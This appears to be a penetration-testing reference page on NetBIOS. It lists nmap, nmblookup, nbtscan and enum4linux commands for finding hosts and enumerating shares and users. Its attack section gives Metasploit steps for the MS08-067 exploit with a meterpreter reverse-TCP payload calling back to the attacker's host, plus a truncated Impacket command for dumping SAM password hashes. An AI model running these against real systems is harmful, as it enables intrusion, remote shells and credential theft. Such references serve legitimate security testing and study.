Skip to main content


Default Port: 137, 138, 139

NetBIOS (Network Basic Input/Output System) is a protocol used for communication within a local network. It allows applications on different computers to communicate over a local area network (LAN), primarily used in early Windows-based networks for name resolution and sharing services like files and printers. Though its usage has decreased over time with the introduction of more secure and scalable solutions, some networks might still have devices using NetBIOS, potentially exposing them to cybersecurity risks.


Identifying NetBIOS

You can use Nmap to check if there's an NetBIOS service on a target host like this:

nmap -p 137,138,139 X.X.X.X


NetBIOS Name Service

NetBIOS operates primarily on ports 137/udp for name services, 138/udp for datagram distribution, and 139/tcp for session services. The name service component is crucial for translating human-friendly computer names within the network into their corresponding IP addresses.

To explore the network and find available NetBIOS names, use the following commands:

nmblookup -A <IP>

nbtscan <IP>/30

sudo nmap -sU -sV -T4 --script nbstat.nse -p137 -Pn -n <IP>

Enumerating Shares and Sessions


enum4linux is a tool for enumerating information from Windows and Samba systems.

enum4linux -a X.X.X.X

This command attempts to retrieve as much information as possible including shares, sessions, and usernames.

Attack Vectors

Exploiting Known Vulnerabilities

Some well-known vulnerabilities might be present in NetBIOS services, depending on the system's configuration and patch level.


MS08-067 is a critical vulnerability in Microsoft Server Message Block (SMB) that could allow remote code execution.

use exploit/windows/smb/ms08_067_netapi
set RHOST <target-ip>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <your-ip>


Dumping Hashes

Dump the SAM database hashes using from Impacket suite: -just-dc <domain>/<user>@<target-ip>